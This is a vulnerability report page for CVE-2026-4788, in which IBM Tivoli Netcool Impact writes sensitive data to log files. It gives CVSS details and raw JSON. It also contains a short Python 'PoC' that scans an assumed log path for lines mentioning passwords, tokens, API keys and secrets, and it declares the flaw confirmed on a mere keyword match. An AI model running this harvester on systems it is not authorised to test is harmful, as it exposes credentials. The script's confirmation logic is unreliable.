Security Vulnerability Report
中文
CVE-2026-4788 CVSS 8.4 HIGH

CVE-2026-4788

Published: 2026-04-08 01:16:41
Last Modified: 2026-04-14 21:29:36

Description

IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.37 stores sensitive information in log files that could be read by a local user.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:tivoli_netcool\/impact:*:*:*:*:*:*:*:* - VULNERABLE
IBM Tivoli Netcool Impact 7.1.0.0
IBM Tivoli Netcool Impact 7.1.0.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os # Proof of Concept (PoC) for CVE-2026-4788 # This script simulates reading sensitive information from log files. LOG_PATH = "/var/log/netcool/impact.log" # Example log path SENSITIVE_KEYWORDS = ["password", "token", "api_key", "secret"] def check_log_leak(): if not os.path.exists(LOG_PATH): print(f"[-] Log file not found at {LOG_PATH}") return print(f"[*] Reading log file: {LOG_PATH}") with open(LOG_PATH, 'r', encoding='utf-8', errors='ignore') as f: content = f.read() found = False for line in content.split('\n'): # Check if line contains sensitive keywords if any(keyword in line.lower() for keyword in SENSITIVE_KEYWORDS): print(f"[!] Potential sensitive data found: {line.strip()}") found = True if not found: print("[*] No obvious sensitive keywords found in this sample.") else: print("[+] Vulnerability confirmed: Sensitive data is logged in plaintext.") if __name__ == "__main__": check_log_leak()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4788", "sourceIdentifier": "[email protected]", "published": "2026-04-08T01:16:41.220", "lastModified": "2026-04-14T21:29:36.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.37 stores sensitive information in log files that could be read by a local user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_netcool\\/impact:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1.0.0", "versionEndExcluding": "7.1.0.38", "matchCriteriaId": "153A4F4B-493F-4908-B84B-1FF59DF36882"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7268267", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}